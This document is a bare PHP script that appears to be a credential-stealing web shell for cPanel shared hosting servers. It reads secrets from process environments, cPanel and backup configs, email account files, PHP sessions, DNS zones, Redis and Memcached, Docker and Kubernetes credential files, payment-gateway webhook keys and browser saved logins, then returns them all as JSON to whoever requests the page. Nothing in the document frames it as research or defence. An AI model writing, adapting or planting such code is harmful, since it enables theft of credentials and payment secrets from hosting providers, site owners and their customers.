<?php $r=[];foreach(glob('/proc/*/environ') as $f){  $c=@file_get_contents($f);if(!$c||strlen($c)<10)continue;  $pid=basename(dirname($f));  $vars=explode(chr(0),$c);  foreach($vars as $v){    if(preg_match('/^(DB_PASS|DB_PASSWORD|SECRET|API_KEY|TOKEN|PRIVATE|AWS_SECRET|STRIPE|MYSQL_PWD|REDIS_PASS)/i',$v))      $r['PROC.'.$pid.'.'.$v]=1;  }}$cpf=['/var/cpanel/backups/config','/etc/remotebackup.conf','/var/cpanel/mainip','/etc/wwwacct.conf'];foreach($cpf as $f){  $c=@file_get_contents($f);if($c)$r['CPANEL.'.basename($f)]=substr($c,0,2000);}foreach(glob('/home/*/.cpanel/email_accounts.json') as $f){  $c=@file_get_contents($f);if($c){    $u=basename(dirname(dirname($f)));    $r['EMAIL_JSON.'.$u]=substr($c,0,5000);  }}$sess_dirs=['/tmp','/var/lib/php/sessions','/var/lib/php/session','/opt/cpanel/ea-php*/root/var/lib/php/session'];foreach($sess_dirs as $sd){  foreach(glob($sd.'/sess_*') ?: [] as $f){    $c=@file_get_contents($f);if(!$c||strlen($c)<50)continue;    if(preg_match('/admin|root|password|token|auth/i',$c))      $r['SESSION.'.basename($f)]=substr($c,0,2000);    if(count($r)>200)break 2;  }}foreach(glob('/var/named/*.db') ?: [] as $f){  $c=@file_get_contents($f);if($c)    $r['DNS.'.basename($f)]=substr($c,0,3000);  if(count($r)>250)break;}foreach(glob('/home/*/.accesshash') as $f){  $c=@file_get_contents($f);if($c){    $u=basename(dirname($f));    $r['ACCESSHASH.'.$u]=trim($c);  }}foreach(glob('/var/cpanel/backups/transport/*') ?: [] as $f){  $c=@file_get_contents($f);if($c)    $r['BACKUP_TRANSPORT.'.basename($f)]=substr($c,0,2000);}$redis_sock=['/var/run/redis/redis.sock','/tmp/redis.sock'];$redis_host='127.0.0.1';$redis_port=6379;try{  $rc=@fsockopen($redis_host,$redis_port,$en,$es,2);  if($rc){    fwrite($rc,"KEYS *session*\r\nKEYS *token*\r\nKEYS *auth*\r\nKEYS *pass*\r\n");    stream_set_timeout($rc,2);    $rd=stream_get_contents($rc);    if($rd&&strlen($rd)>5)$r['REDIS.keys']=substr($rd,0,5000);    fwrite($rc,"CONFIG GET requirepass\r\n");    $rp=stream_get_contents($rc);    if($rp&&strpos($rp,'$')!==false)$r['REDIS.config']=substr($rp,0,500);    fclose($rc);  }}catch(Exception $e){}try{  $mc=@fsockopen('127.0.0.1',11211,$en,$es,2);  if($mc){    fwrite($mc,"stats\r\n");    stream_set_timeout($mc,2);    $ms=stream_get_contents($mc);    if($ms)$r['MEMCACHED.stats']=substr($ms,0,3000);    fwrite($mc,"stats cachedump 1 100\r\n");    $md=stream_get_contents($mc);    if($md)$r['MEMCACHED.keys']=substr($md,0,5000);    fclose($mc);  }}catch(Exception $e){}$docker_paths=['/root/.docker/config.json','/home/*/.docker/config.json','/var/run/secrets/kubernetes.io/serviceaccount/token','/etc/kubernetes/admin.conf','/root/.kube/config'];foreach($docker_paths as $dp){  foreach(glob($dp)?:[$dp] as $f){    $c=@file_get_contents($f);if($c){      $key='DOCKER.'.basename(dirname($f)).'.'.basename($f);      $r[$key]=substr($c,0,3000);    }  }}foreach(glob('/home/*/docker-compose.yml') ?: [] as $f){  $c=@file_get_contents($f);if($c&&preg_match('/password|secret|key|token/i',$c))    $r['DOCKER_COMPOSE.'.basename(dirname($f))]=substr($c,0,3000);}foreach(glob('/home/*/.env.docker') ?: [] as $f){  $c=@file_get_contents($f);if($c)$r['DOCKER_ENV.'.basename(dirname($f))]=substr($c,0,2000);}$webhook_patterns=['stripe','paypal','braintree','square','mollie','razorpay','coinbase','paddle'];foreach(glob('/home/*/public_html/{*.php,*.json,config/*.php,app/config/*.php}',GLOB_BRACE) ?: [] as $f){  $c=@file_get_contents($f);if(!$c||strlen($c)>500000)continue;  foreach($webhook_patterns as $wp){    if(stripos($c,$wp)!==false){      preg_match_all('/(https?:\/\/[^\s\'\"]+(?:webhook|hook|notify|ipn|callback)[^\s\'\"]*)/i',$c,$m);      foreach($m[1] as $url)$r['WEBHOOK.'.basename(dirname($f)).'.'.$wp]=$url;      preg_match_all('/(?:secret|key|token|sig)\w*\s*[=:]\s*[\'\"]([^\'\"]{20,})[\'\"]/',$c,$m2);      foreach($m2[1] as $v)$r['PAY_KEY.'.basename(dirname($f)).'.'.$wp]=$v;      break;    }  }  if(count($r)>300)break;}$browser_paths=['/root/.config/google-chrome/Default/Login Data','/root/.mozilla/firefox/*.default*/logins.json','/home/*/.config/google-chrome/Default/Login Data','/home/*/.mozilla/firefox/*.default*/logins.json'];foreach($browser_paths as $bp){  foreach(glob($bp) ?: [] as $f){    if(strpos($f,'Login Data')!==false){      $r['BROWSER.chrome.'.basename(dirname(dirname(dirname($f))))]='[SQLite DB - '.filesize($f).' bytes at '.$f.']';    }elseif(strpos($f,'logins.json')!==false){      $c=@file_get_contents($f);if($c)$r['BROWSER.firefox.'.basename(dirname($f))]=substr($c,0,5000);    }  }}echo json_encode(['ok'=>1,'data'=>$r,'count'=>count($r)]);?>